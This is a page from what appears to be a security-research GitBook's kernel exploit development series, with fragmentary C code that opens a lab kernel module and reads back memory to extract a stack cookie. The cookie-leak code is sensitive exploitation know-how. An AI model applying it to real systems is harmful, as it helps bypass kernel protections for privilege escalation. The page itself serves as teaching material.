Breaking Bits
  • What this gitbook is
  • Vulnerability Discovery
    • Reverse Engineering
      • Modern Vulnerability Research Techniques on Embedded Systems
      • Remote Dynamic Blackbox Java App Analysis
    • Emulation
      • QEMU Usermode Tracing
      • Building QEMU on Ubuntu
    • Fuzzing with AFL
    • Automated Vulnerability Discovery
      • Buffer Overflows
      • Analyzing Functions
    • Automatic Exploit Generation
      • Automatic Rop Chain Generation
  • CTF
  • Battelle Shmoocon 2024
    • Time Jump Planner
  • Spaceheros CTF 2022
    • RE: Shai-Hulud
  • UMDCTF 2020
    • UMDCTF 2020: Evil Santa's Mysterious Box of Treats
  • UMDCTF 2022
    • Tracestory
  • Spaceheroes CTF 2023
    • Everything-is-wrong
  • US CyberGames RE-Cruise 4
  • Firmware Emulator
  • Interactive Firmware Emulator Usage
  • Recreating CVE-2015-1187 in the DIR-820L
  • Exploit Development
    • Linux kernel exploit development
      • Setup
      • Interacting with Kernel Modules
      • Kernel stack cookies
      • Kernel Address Space Layout Randomization (KALSR)
      • Supervisor mode execution protection (SMEP)
      • Kernel page table isolation (KPTI)
      • Supervisor Mode Access Prevention (SMAP)
Powered by GitBook
On this page

Was this helpful?

  1. Exploit Development
  2. Linux kernel exploit development

Interacting with Kernel Modules

Character devices

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

#define KERN_MODULE "/dev/kernel-overflow"
void main()
{
    /*
     * Interacting with this kernel module is easy
     * just treat it like a file
     */

    int fd;
    unsigned long stack_cookie;

    fd = open(KERN_MODULE, O_RDWR);
    if (fd < 0) exit(-1);
    
    close(fd);
    
}
unsigned long do_read(int fd)
{
    int bytes_read;
    unsigned long * buf = NULL;
    unsigned long stack_cookie;
    unsigned int cookie_offset = 16;

    buf = malloc(BUF_SIZE);
    if (buf == NULL) exit_and_log("Failed to malloc\n");
---
    memset(buf, '\x00', BUF_SIZE);

    bytes_read = read(fd, buf, BUF_SIZE);

    /*
     * For every 8 bytes read, print them
     */
    for(int i =0; i <(BUF_SIZE / WORD_SIZE);i++)
    {
        printf("buf + 0x%X\t: %lX\n",i*WORD_SIZE, buf[i]);        
    }

    stack_cookie = buf[cookie_offset];
    free(buf);

    return stack_cookie; 
}
PreviousSetupNextKernel stack cookies

Last updated 3 years ago

Was this helpful?